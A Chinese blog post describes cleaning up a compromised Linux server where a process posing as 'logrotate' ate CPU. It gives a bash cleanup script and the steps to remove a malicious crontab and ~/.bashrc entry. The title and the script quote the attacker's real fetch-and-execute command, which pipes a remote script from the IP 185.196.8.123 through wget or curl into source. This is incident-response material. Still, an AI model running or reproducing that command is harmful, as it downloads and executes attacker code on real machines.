linux服务器被入侵,出现@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://118

1.服务器速度非常慢,使用top命令查看cpu占比,发现logrotate占据超100%

在这里插入图片描述

2.使用 ps -ef|grep logrotate命令查看进程

在这里插入图片描述

3.因为总是出现,所以猜测是否被入侵,通过查找发现了木马执行的脚本文件地址

在这里插入图片描述
删除该脚本文件(后来才知道:名字是多变的 记录名字没用)
参考文章:

https://blog.csdn.net/qq32933432/article/details/135408156

4.一开始的解决方法是编写定时任务执行杀死进程的脚本

4.1 编写脚本,地址为 /usr/local/software/ship/sadmin/killlog/killnolog.sh

脚本的作用是:发现进程名为logrotate的非本次查询的所有进程PID并用空格分割,发现存在PID即进行删除,并清除病毒产生的定时任务,最后查看是否删除完毕

#!/bin/bash  
process_name=logrotate
#查找并杀死进程名 
PID=`ps -ef |grep $process_name|grep -v grep|awk '{print $2}'|xargs`
save_file="/usr/local/software/ship/sadmin/killlog/killlog.log"
current_time=$(date "+%Y-%m-%d %H:%M:%S")
#判断进程号是否存在
if [[ -z $PID ]]; then
    echo -e "\n\n\n$current_time】暂无可删除的$process_name记录" >> $save_file
else
    kill -9 $PID
    echo -e "\n\n\n$current_time】已删除$process_name的【$PID】进程" >> $save_file
    #删除自动注入的定时脚本任务
    cron_name="source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)"
    del_result=`(crontab -l | grep -v "$cron_name") | crontab -`
    result=`crontab -l`
    echo -e "当前的定时任务为:$result" >> $save_file
    PID_NOW=`ps -ef |grep $process_name|grep -v grep|awk '{print $2}'|xargs`
    echo -e "-------------------当前$process_name有【$PID_NOW】进程" >> $save_file
fi

4.2 crontab -e 进入编写执行定时任务(每分钟执行一次)

发现病毒也插入了定时任务
在这里插入图片描述
删除该定时任务,编写自己的定时任务

*/1 * * * * /usr/local/software/ship/sadmin/killlog/killnolog.sh

使用crontab -l可查看存在的定时任务,没有病毒的定时任务即可
在这里插入图片描述

5.后来发现了比较彻底版的解决方法

5.1 病毒在环境变量(~/.bashrc)中添加的下载命令,除非特殊需求,一般我们不在这个环境变量配置的文件里面写这种命令

这是之前还有病毒下载命令的文件
在这里插入图片描述
删除这句话 然后重新source一下就好了

(之前有过source /etc/profile的经验,这个非本人解决,所以猜测是source ~/.bashrc这个命令)

cd ~
ls -la
vim .bashrc

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
这个命令是用来使用wget工具下载一个名为epel.repo的文件,并将其保存到/etc/yum.repos.d/目录下。文件的下载地址是http://mirrors.aliyun.com/repo8。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CentOS8 / CentOS7 yum源最新修改搭建 2022.3.1](https://blog.csdn.net/lqzixi/article/details/123217855)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CentOS下yum命令报错File contains no section headers. file: file:///etc/yum.repos.d/](https://blog.csdn.net/xiongIT/article/details/127705053)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Centos7同步阿里yum仓库搭建yum私有仓库](https://download.csdn.net/download/weixin_38733885/14885815)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值